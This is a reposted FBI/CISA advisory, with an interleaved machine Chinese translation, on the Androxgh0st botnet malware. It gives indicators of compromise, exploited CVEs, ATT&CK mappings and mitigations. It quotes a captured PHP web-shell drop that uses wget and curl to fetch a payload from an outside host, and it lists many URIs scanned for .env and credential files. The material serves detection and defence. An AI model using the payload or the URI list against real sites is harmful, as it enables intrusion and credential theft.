Known Indicators of Compromise Associated with Androxgh0st Malware


The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) to disseminate known indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) associated with threat actors deploying Androxgh0st malware. Multiple, ongoing investigations and trusted third party reporting yielded the IOCs and TTPs, and provided information on Androxgh0st malware’s ability to establish a botnet that can further identify and compromise vulnerable networks.
联邦调查局 (FBI) 和网络安全和基础设施安全局 (CISA) 正在发布此联合网络安全公告 (CSA),以传播与部署 Androxgh0st 恶意软件的威胁行为者相关的已知入侵指标 (IOC) 和战术、技术和程序 (TTP)。多项正在进行的调查和受信任的第三方报告产生了 IOC 和 TTP,并提供了有关 Androxgh0st 恶意软件建立僵尸网络的能力的信息,该僵尸网络可以进一步识别和破坏易受攻击的网络。

The FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of cybersecurity incidents caused by Androxgh0st infections.
FBI 和 CISA 鼓励组织实施本 CSA 的“缓解”部分中的建议,以减少由 Androxgh0st 感染引起的网络安全事件的可能性和影响。

Download the PDF version of this report:

AA24-016A Known Indicators of Compromise Associated with Androxgh0st Malware
AA24-016A 与 Androxgh0st 恶意软件相关的已知入侵指标
(PDF, 576.40 KB )
(PDF格式,576.40 KB)

For a downloadable copy of IOCs, see:
有关 IOC 的可下载副本,请参阅:

AA24-016A STIX XML格式
(XML, 45.81 KB )
(XML格式,45.81 KB )

AA24-016A STIX JSON(JSON, 39.87 KB )
(JSON, 39.87 KB )


Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques with corresponding mitigation and/or detection recommendations. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
注意:此通报使用 MITRE ATT&CK ® for Enterprise 框架版本 14。请参阅 MITRE ATT&CK 策略和技术部分,了解映射到 MITRE ATT&CK 策略和技术的威胁参与者活动表,以及相应的缓解和/或检测建议。有关将恶意网络活动映射到 MITRE ATT&CK 框架的帮助,请参阅 CISA 和 MITRE ATT&CK 的 MITRE ATT&CK 映射最佳实践和 CISA 的决策器工具。

Overview 概述

Androxgh0st malware has been observed establishing a botnet [T1583.005] for victim identification and exploitation in target networks. According to open source reporting[1], Androxgh0st is a Python-scripted malware [T1059.006] primarily used to target .env files that contain confidential information, such as credentials [T1552.001] for various high profile applications (i.e., Amazon Web Services [AWS], Microsoft Office 365, SendGrid, and Twilio from the Laravel web application framework). Androxgh0st malware also supports numerous functions capable of abusing the Simple Mail Transfer Protocol (SMTP), such as scanning [T1046] and exploiting exposed credentials [T1078] and application programming interfaces (APIs) [T1114], and web shell deployment [T1505.003].
已观察到 Androxgh0st 恶意软件建立了一个僵尸网络 [T1583.005],用于在目标网络中识别和利用受害者。根据开源报告[1],Androxgh0st是一种Python脚本恶意软件[T1059.006],主要用于针对包含机密信息的.env文件,例如各种知名应用程序(即Amazon Web Services [AWS],Microsoft Office 365,SendGrid和Laravel Web应用程序框架中的Twilio)的凭据[T1552.001]。Androxgh0st 恶意软件还支持许多能够滥用简单邮件传输协议 (SMTP) 的功能,例如扫描 [T1046] 并利用暴露的凭据 [T1078] 和应用程序编程接口 (API) [T1114] 以及 Web Shell 部署 [T1505.003]。

Targeting the PHPUnit 以 PHPUnit 为目标

Androxgh0st malware TTPs commonly involves the use of scripts, conducting scanning [T1595] and searching for websites with specific vulnerabilities. In particular, threat actors deploying Androxgh0st have been observed exploiting CVE-2017-9841 to remotely run hypertext preprocessor (PHP) code on fallible websites via PHPUnit [T1190]. Websites using the PHPUnit module that have internet-accessible (exposed) /vendor folders are subject to malicious HTTP POST requests to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php uniform resource identifier (URI). This PHP page runs PHP code submitted through a POST request, which allows the threat actors to remotely execute code.
Androxgh0st 恶意软件 TTP 通常涉及使用脚本、执行扫描 [T1595] 和搜索具有特定漏洞的网站。特别是,已观察到部署 Androxgh0st 的威胁行为者利用 CVE-2017-9841 通过 PHPUnit [T1190] 在易犯错误的网站上远程运行超文本预处理器 (PHP) 代码。使用 PHPUnit 模块的网站,如果具有可通过 Internet 访问(公开)的文件夹,则会受到对 /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 统一资源标识符 (URI) /vendor 的恶意 HTTP POST 请求。此 PHP 页面运行通过 POST 请求提交的 PHP 代码,这允许威胁参与者远程执行代码。

Malicious actors likely use Androxgh0st to download malicious files [T1105] to the system hosting the website. Threat actors are further able to set up a fake (illegitimate) page accessible via the URI to provide backdoor access to the website. This allows threat actors to download additional malicious files for their operations and access databases.
恶意行为者可能使用 Androxgh0st 将恶意文件 [T1105] 下载到托管网站的系统。威胁行为者还可以进一步设置可通过 URI 访问的虚假(非法)页面,以提供对网站的后门访问。这允许威胁参与者下载其他恶意文件用于其操作并访问数据库。

Laravel Framework Targeting
Laravel 框架目标

Androxgh0st malware establishes a botnet to scan for websites using the Laravel web application framework. After identifying websites using the Laravel web application, threat actors attempt to determine if the domain’s root-level .env file is exposed and contains credentials for accessing additional services. Note: .env files commonly store credentials and tokens. Threat actors often target .env files to steal these credentials within the environment variables.
Androxgh0st 恶意软件建立了一个僵尸网络,使用 Laravel Web 应用程序框架扫描网站。在使用 Laravel Web 应用程序识别网站后,威胁参与者会尝试确定域的根级 .env 文件是否已公开并包含用于访问其他服务的凭据。注意: .env 文件通常存储凭据和令牌。威胁参与者通常以文件为目标,以 .env 在环境变量中窃取这些凭据。

If the .env file is exposed, threat actors will issue a GET request to the /.env URI to attempt to access the data on the page. Alternatively, Androxgh0st may issue a POST request to the same URI with a POST variable named 0x[] containing certain data sent to the web server. This data is frequently used as an identifier for the threat actor. This method appears to be used for websites in debug mode (i.e., when non-production websites are exposed to the internet). A successful response from either of these methods allows the threat actors to look for usernames, passwords, and/or other credentials pertaining to services such as email (via SMTP) and AWS accounts.
如果 .env 文件暴露,威胁参与者将向 /.env URI 发出 GET 请求,以尝试访问页面上的数据。或者,Androxgh0st 可以向同一 URI 发出 POST 请求,该 URI 具有一个名为 POST 的变量,该变量包含 0x[] 发送到 Web 服务器的某些数据。此数据经常用作威胁参与者的标识符。此方法似乎用于处于调试模式的网站(即,当非生产网站暴露在互联网上时)。如果通过这两种方法中的任何一种成功响应,威胁参与者就可以查找与电子邮件(通过 SMTP)和 AWS 账户等服务相关的用户名、密码和/或其他凭证。

Androxgh0st malware can also access the application key [TA0006] for the Laravel application on the website. If the threat actors successfully identify the Laravel application key, they will attempt exploitation by using the key to encrypt PHP code [T1027.010]. The encrypted code is then passed to the website as a value in the cross-site forgery request (XSRF) token cookie, XSRF-TOKEN, and included in a future GET request to the website. The vulnerability defined in CVE-2018-15133 indicates that on Laravel applications, XSRF token values are subject to an un-serialized call, which can allow for remote code execution. In doing so, the threat actors can upload files to the website via remote access.
Androxgh0st 恶意软件还可以访问网站上 Laravel 应用程序的应用程序密钥 [TA0006]。如果威胁参与者成功识别了 Laravel 应用程序密钥,他们将尝试使用该密钥加密 PHP 代码 [T1027.010] 进行利用。然后,加密代码将作为跨站点伪造请求 (XSRF) 令牌 cookie XSRF-TOKEN 中的值传递到网站,并包含在将来对网站的 GET 请求中。CVE-2018-15133 中定义的漏洞表明,在 Laravel 应用程序上,XSRF 令牌值受到未序列化调用的约束,这允许远程执行代码。这样,威胁行为者可以通过远程访问将文件上传到网站。

Apache Web Server Targeting
Apache Web 服务器目标

In correlation with CVE-2021-41773, Androxgh0st actors have been observed scanning vulnerable web servers [T1595.002] running Apache HTTP Server versions 2.4.49 or 2.4.50. Threat actors can identify uniform resource locators (URLs) for files outside root directory through a path traversal attack [T1083]. If these files are not protected by the “request all denied” configuration and Common Gateway Interface (CGI) scripts are enabled, this may allow for remote code execution.
与 CVE-2021-41773 相关,已观察到 Androxgh0stactors 扫描运行 Apache HTTP Server 版本 2.4.49 或 2.4.50 的易受攻击的 Web 服务器 [T1595.002]。威胁参与者可以通过路径遍历攻击 [T1083] 识别根目录之外文件的统一资源定位符 (URL)。如果这些文件不受“请求全部拒绝”配置的保护,并且启用了通用网关接口 (CGI) 脚本,则可能允许远程执行代码。

If threat actors obtain credentials for any services using the above methods, they may use these credentials to access sensitive data or use these services to conduct additional malicious operations. For example, when threat actors successfully identify and compromise AWS credentials from a vulnerable website, they have been observed attempting to create new users and user policies [T1136]. Additionally, Andoxgh0st actors have been observed creating new AWS instances to use for conducting additional scanning activity [T1583.006].
如果威胁参与者使用上述方法获取任何服务的凭据,他们可能会使用这些凭据访问敏感数据或使用这些服务进行其他恶意操作。例如,当威胁行为者成功识别并破坏来自易受攻击网站的 AWS 凭证时,已观察到他们试图创建新的用户和用户策略 [T1136]。此外,还观察到 Andoxgh0st 参与者创建新的 AWS 实例以用于执行其他扫描活动 [T1583.006]。

入侵指标 (IOC)

Based on investigations and analysis, the following requests are associated with Androxgh0st activity:
根据调查和分析,以下请求与 Androxgh0st 活动相关联:

  • Incoming GET and POST requests to the following URIs:
    传入到以下 URI 的 GET 和 POST 请求:

    • /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
    • /.env
  • Incoming POST requests with the following strings:
    具有以下字符串的传入 POST 请求:

    • [0x%5B%5D=androxgh0st]
    • ImmutableMultiDict([(‘0x[]’, ‘androxgh0st’)])

In both previously listed POST request strings, the name androxgh0st has been observed to be replaced with other monikers.
在前面列出的两个 POST 请求字符串中,已观察到该名称 androxgh0st 已替换为其他名字对象。

Additional URIs observed by the FBI and a trusted third party used by these threat actors for credential exfiltration include:
FBI 和这些威胁参与者用于凭据外泄的受信任第三方观察到的其他 URI 包括:

  • /info
  • /phpinfo
  • /phpinfo.php
  • /?phpinfo=1
  • /frontend_dev.php/$
  • /_profiler/phpinfo
  • /debug/default/view?panel=config
  • /config.json
  • /.json
  • /.git/config
  • /live_env
  • /.env.dist
  • /
  • /environments/.env.production
  • /.env.production.local
  • /.env.project
  • /.env.development
  • /.env.production
  • /
  • /.env.development.local
  • /.env.old
  • /<insert-directory>/.env
    • Note: the actor may attempt multiple different potential URI endpoints scanning for the .env file, for example /docker/.env or /local/.env.
      注意:参与者可能会尝试扫描 .env 多个不同的潜在 URI 端点以扫描文件,例如 /docker/.env or /local/.env .
  • /.aws/credentials
  • /aws/credentials
  • /.aws/config
  • /.git
  • /.test
  • /admin
  • /backend
  • /app
  • /current
  • /demo
  • /api
  • /backup
  • /beta
  • /cron
  • /develop
  • /Laravel
  • /laravel/core
  • /gists/cache
  • /test.php
  • /info.php
  • //.env
  • /admin-app/.env%20
  • /laravel/.env%20
  • /shared/.env%20
  • /.env.project%20
  • /apps/.env%20
  • /development/.env%20
  • /live_env%20
  • /.env.development%20
Targeted URIs for web-shell drop:
web-shell 删除的目标 URI:
  • /.env/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //lib/phpunit/phpunit/Util/PHP/eval-stdin.php
  • //lib/phpunit/src/Util/PHP/eval-stdin.php
  • //lib/phpunit/Util/PHP/eval-stdin.php
  • //new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //phpunit/phpunit/Util/PHP/eval-stdin.php
  • //phpunit/src/Util/PHP/eval-stdin.php
  • //phpunit/Util/PHP/eval-stdin.php
  • //protected/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/evalstdin.php
  • //vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
  • //vendor/phpunit/src/Util/PHP/eval-stdin.php
  • //vendor/phpunit/Util/PHP/eval-stdin.php
  • //wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /admin/ckeditor/plugins/ajaxplorer/phpunit/src/Util/PHP/eval-stdin.php
  • /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /api/vendor/phpunit/phpunit/src/Util/PHP/Template/eval-stdin.php
  • /lab/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /laravel_web/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /laravelao/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /lib/phpunit/phpunit/Util/PHP/eval-stdin.php
  • /lib/phpunit/phpunit/Util/PHP/eval
  • stdin.php%20/lib/phpunit/src/Util/PHP/eval-stdin.php
  • /lib/phpunit/src/Util/PHP/eval-stdin.php
  • /lib/phpunit/Util/PHP/eval-stdin.php
  • /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /libraries/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /phpunit/phpunit/Util/PHP/eval-stdin.php
  • /phpunit/phpunit/Util/PHP/eval-stdin.php%20/phpunit/src/Util/PHP/evalstdin.php
  • /phpunit/src/Util/PHP/eval-stdin.php
  • ./phpunit/Util/PHP/eval-stdin.php
  • /phpunit/Util/PHP/eval-stdin.php%20/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /vendor/phpunit/phpunit/src/Util/PHP/
  • /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
  • /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php%20/vendor/phpunit/src/Util/PHP/eval-stdin.php
  • /vendor/phpunit/src/Util/PHP/eval-stdin.php
  • /vendor/phpunit/Util/PHP/eval-stdin.php
  • /vendor/phpunit/Util/PHP/eval-stdin.php%20
  • /phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
An example of attempted credential exfiltration through (honeypot) open proxies:

POST /.aws/credentials HTTP/1.1
user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
accept-encoding: gzip, deflate
accept: */*
connection: keep-alive
content-length: 20
content-type: application/x-www-form-urlencoded


An example of attempted web-shell drop through (honeypot) open proxies:
尝试通过 web-shell(蜜罐)开放代理的示例:

user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36 Edg/116.0.1938.76
accept-encoding: gzip, deflate
accept: */*
connection: keep-alive
content-length: 279

<?php file_put_contents(‘evil.php’,file_get_contents(‘hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt’)); system(‘wget hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt -O evil.php;curl hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt -O evil.php’); ?>
<?php file_put_contents(’邪恶.php’,file_get_contents(’hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt’));system(’wget hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt -O evil.php;卷曲 hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt -O evil.php’); ?>

Monikers used instead of Androxgh0st (0x%5B%5D=???):
使用名字对象代替 Androxgh0st (0x%5B%5D=???):
  • Ridho 里多
  • Aws
  • 0x_0x
  • x_X
  • nopebee7
  • evileyes0 邪恶之眼0
  • privangga 普里旺加
  • drcrypter Drcrypter的
  • errorcool
  • drosteam 渣滓
  • androxmen 雄性人
  • crack3rz 裂纹3RZ
  • b4bbyghost b4bbyghost的
  • 0x0day 0x0天
  • janc0xsec
  • blackb0x 黑色B0X
  • 0x1331day 0x1331天
  • Graber 刨丝机
Example malware drops through eval-stdin.php:
恶意软件通过 eval-stdin.php 丢弃的示例:










See Tables 1-10 for all referenced threat actor tactics and techniques in this advisory.
请参阅表 1-10,了解此通报中所有引用的威胁参与者策略和技术。

Table 1: Reconnaissance 表1:侦察

Technique Title 技术标题 ID Use

Active Scanning: Vulnerability Scanning

T1595.002 编号:T1595.002

The threat actor scans websites for specific vulnerabilities to exploit.

Table 2: Resource Development

Technique Title 技术标题 ID Use

Acquire Infrastructure: Botnet

T1583.005 编号:T1583.005

The threat actor establishes a botnet to identify and exploit victims.

Acquire Infrastructure: Web Services
获取基础结构:Web 服务

T1583.006 编号:T1583.006

The threat actor creates new AWS instances to use for scanning.
威胁参与者创建新的 AWS 实例以用于扫描。

Table 3: Initial Access 表 3:初始访问

Technique Title 技术标题 ID Use

Exploit Public-Facing Application

T1190 T1190型

The threat actor exploits CVE-2017-9841 to remotely run hypertext preprocessor (PHP) code on websites via PHPUnit.
威胁行为者利用 CVE-2017-9841 通过 PHPUnit 在网站上远程运行超文本预处理器 (PHP) 代码。

Table 4: Execution 表 4:执行

Technique Title 技术标题 ID Use

Command and Scripting Interpreter: Python

T1059.006 编号:T1059.006

The threat actor uses Androxgh0st, a Python-scripted malware, to target victim files.
威胁参与者使用 Androxgh0st(一种 Python 脚本恶意软件)来攻击受害者文件。

Table 5: Persistence 表 5:持久性

Technique Title 技术标题 ID Use

Valid Accounts 有效帐户

T1078 T1078型

The threat actor abuses the simple mail transfer protocol (SMTP) by exploiting exposed credentials.
威胁参与者通过利用公开的凭据来滥用简单邮件传输协议 (SMTP)。

Server Software Component: Web Shell
服务器软件组件:Web Shell

T1505.003 编号:T1505.003

The threat actor deploys web shells to maintain persistent access to systems.
威胁参与者部署 Web Shell 以保持对系统的持久访问。

Create Account 创建账户

T1136 编号:T1136

The threat actor attempts to create new users and user policies with compromised AWS credentials from a vulnerable website.
威胁参与者尝试使用泄露的 AWS 凭证从易受攻击的网站创建新用户和用户策略。

Table 6: Defense Evasion 表6:防御规避

Technique Title 技术标题 ID Use

Obfuscated Files or Information: Command Obfuscation

T1027.010 编号:T1027.010

The threat actor can exploit a successfully identified Laravel application key to encrypt PHP code, which is then passed to the site as a value in the XSRF-TOKEN cookie.
威胁参与者可以利用成功识别的 Laravel 应用程序密钥来加密 PHP 代码,然后将其作为 XSRF-TOKEN cookie 中的值传递到站点。

Table 7: Credential Access
表 7:凭据访问

Technique Title 技术标题 ID Use

Credential Access 凭据访问

TA0006 编号: TA0006

The threat actor can access the application key of the Laravel application on the site.
威胁参与者可以访问站点上 Laravel 应用程序的应用程序密钥。

Unsecured Credentials: Credentials in Files

T1552.001 编号: T1552.001

The threat actor targets .env files that contain confidential credential information.
威胁参与者以包含机密凭据信息的 .env 文件为目标。

Table 8: Discovery 表 8:发现

Technique Title 技术标题 ID Use

File and Directory Discovery

T1083 T1083型

The threat actor can identify URLs for files outside root directory through a path traversal attack.
威胁参与者可以通过路径遍历攻击来识别根目录之外的文件的 URL。

Network Service Discovery

T1046 T1046型

The threat actor uses Androxgh0st to abuse simple mail transfer protocol (SMTP) via scanning.
威胁参与者使用 Androxgh0st 通过扫描滥用简单邮件传输协议 (SMTP)。

Table 9: Collection 表 9:集合

Technique Title 技术标题 ID Use

Email Collection 电子邮件收藏

T1114 T1114型

The threat actor interacts with application programming interfaces (APIs) to gather information.
威胁参与者与应用程序编程接口 (API) 交互以收集信息。

Table 10: Command and Control
表 10:命令和控制

Technique Title 技术标题 ID Use

Ingress Tool Transfer Ingress 工具转移

T1105 T1105型

The threat actor runs PHP code through a POST request to download malicious files to the system hosting the website.
威胁参与者通过 POST 请求运行 PHP 代码,将恶意文件下载到托管网站的系统。


The FBI and CISA recommend implementing the mitigations below to improve your organization’s cybersecurity posture based on Androxgh0st threat actor activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
FBI 和 CISA 建议实施以下缓解措施,以根据 Androxgh0st 威胁参与者活动改善组织的网络安全态势。这些缓解措施符合 CISA 和美国国家标准与技术研究院 (NIST) 制定的跨部门网络安全绩效目标 (CPG)。CPG 提供了 CISA 和 NIST 建议所有组织实施的最低限度的做法和保护措施。CISA 和 NIST 将 CPG 建立在现有的网络安全框架和指南之上,以防范最常见和最有影响力的威胁、策略、技术和程序。访问 CISA 的跨部门网络安全绩效目标,了解有关 CPG 的更多信息,包括其他建议的基线保护。

These mitigations apply to all critical infrastructure organizations and network defenders. FBI and CISA recommend that software manufacturers incorporate secure by design principles and tactics into their software development practices, limiting the impact of actor techniques and strengthening their customers’ security posture. For more information on secure by design, see CISA’s Secure by Design webpage.
这些缓解措施适用于所有关键基础设施组织和网络防御者。FBI 和 CISA 建议软件制造商将安全设计原则和策略纳入其软件开发实践中,限制参与者技术的影响并加强客户的安全态势。有关安全设计的详细信息,请参阅 CISA 的 Secure by Design 网页。

The FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by actors using Androxgh0st malware.
FBI 和 CISA 建议网络防御者应用以下缓解措施,以限制对通用系统和网络发现技术的潜在对抗性使用,并降低使用 Androxgh0st 恶意软件的攻击者入侵的风险。

  • Keep all operating systems, software, and firmware up to date. Specifically, ensure that Apache servers are not running versions 2.4.49 or 2.4.50. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems.
    使所有操作系统、软件和固件保持最新状态。具体而言,请确保 Apache 服务器未运行版本 2.4.49 或 2.4.50。及时打补丁是组织可以采取的最有效和最具成本效益的步骤之一,以最大程度地减少其遭受网络安全威胁的风险。优先修补面向互联网的系统中已知的被利用漏洞。
  • Verify that the default configuration for all URIs is to deny all requests unless there is a specific need for it to be accessible.
    验证所有 URI 的默认配置是否为拒绝所有请求,除非有特定需要使其可访问。
  • Ensure that any live Laravel applications are not in “debug” or testing mode. Remove all cloud credentials from .env files and revoke them. All cloud providers have safer ways to provide temporary, frequently rotated credentials to code running inside a web server without storing them in any file.
    确保任何实时的 Laravel 应用程序都未处于“调试”或测试模式。从 .env 文件中删除所有云凭据并撤销它们。所有云提供商都有更安全的方法来为 Web 服务器内运行的代码提供临时的、经常轮换的凭据,而无需将它们存储在任何文件中。
  • On a one-time basis for previously stored cloud credentials, and on an on-going basis for other types of credentials that cannot be removed, review any platforms or services that have credentials listed in the .env file for unauthorized access or use.
    对于以前存储的云凭据,以及对于无法删除的其他类型的凭据,请持续检查 .env 文件中列出的凭据的任何平台或服务,以进行未经授权的访问或使用。
  • Scan the server’s file system for unrecognized PHP files, particularly in the root directory or /vendor/phpunit/phpunit/src/Util/PHP folder.
    扫描服务器的文件系统以查找无法识别的 PHP 文件,尤其是在根目录或 /vendor/phpunit/phpunit/src/Util/PHP 文件夹中。
  • Review outgoing GET requests (via cURL command) to file hosting sites such as GitHub, pastebin, etc., particularly when the request accesses a .php file.
    查看传出的 GET 请求(通过 cURL 命令)到文件托管站点(如 GitHub、pastebin 等),尤其是在请求访问 .php 文件时。


In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
除了应用缓解措施外,FBI 和 CISA 还建议针对此通报中映射到 MITRE ATT&CK for Enterprise 框架的威胁行为执行、测试和验证组织的安全计划。创作机构建议测试现有的安全控制清单,以评估它们如何针对本通报中描述的 ATT&CK 技术执行。

To get started: 要开始使用,请执行以下操作:

  1. Select an ATT&CK technique described in this advisory (see Tables 1-10).
    选择此公告中描述的 ATT&CK 技术(请参阅表 1-10)。
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
FBI 和 CISA 建议在生产环境中持续大规模测试您的安全计划,以确保针对本公告中确定的 MITRE ATT&CK 技术的最佳性能。


The FBI encourages organizations to report information concerning suspicious or criminal activity to their local FBI field office. With regards to specific information that appears in this CSA, indicators should always be evaluated in light of an organization’s complete security situation.
联邦调查局鼓励组织向当地联邦调查局外地办事处报告有关可疑或犯罪活动的信息。对于本 CSA 中出现的具体信息,应始终根据组织的完整安全状况来评估指标。

When available, each report submitted should include the date, time, location, type of activity, number of people, and type of equipment used for the activity, the name of the submitting company or organization, and a designated point of contact. Reports can be submitted to the FBI Internet Crime Complaint Center (IC3), a local FBI Field Office, or to CISA via its Incident Reporting System or its 24/7 Operations Center at [email protected] or (888) 282-0870.
如果有,提交的每份报告都应包括日期、时间、地点、活动类型、人数和用于活动的设备类型、提交公司或组织的名称以及指定的联系人。报告可以提交给 FBI 互联网犯罪投诉中心 (IC3)、当地的 FBI 外地办事处,或通过其事件报告系统或其 24/7 运营中心(电话 [email protected] 或 (888) 282-0870 提交给 CISA。



  1. Fortinet – FortiGuard Labs: Threat Signal Report: AndroxGh0st Malware Actively Used in the Wild
    Fortinet – FortiGuard Labs:威胁信号报告:AndroxGh0st 恶意软件在野外被积极使用


Amazon contributed to this CSA.
亚马逊为此 CSA 做出了贡献。


The information in this report is being provided “as is” for informational purposes only. FBI and CISA do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI and CISA.
本报告中的信息按“原样”提供,仅供参考。FBI 和 CISA 不认可任何商业实体、产品、公司或服务,包括本文档中链接的任何实体、产品或服务。任何通过服务标志、商标、制造商或其他方式对特定商业实体、产品、流程或服务的引用,均不构成或暗示 FBI 和 CISA 的认可、推荐或支持。

原文始发于CISA:Known Indicators of Compromise Associated with Androxgh0st Malware

版权声明:admin 发表于 2024年1月22日 下午10:51。
转载请注明:Known Indicators of Compromise Associated with Androxgh0st Malware | CTF导航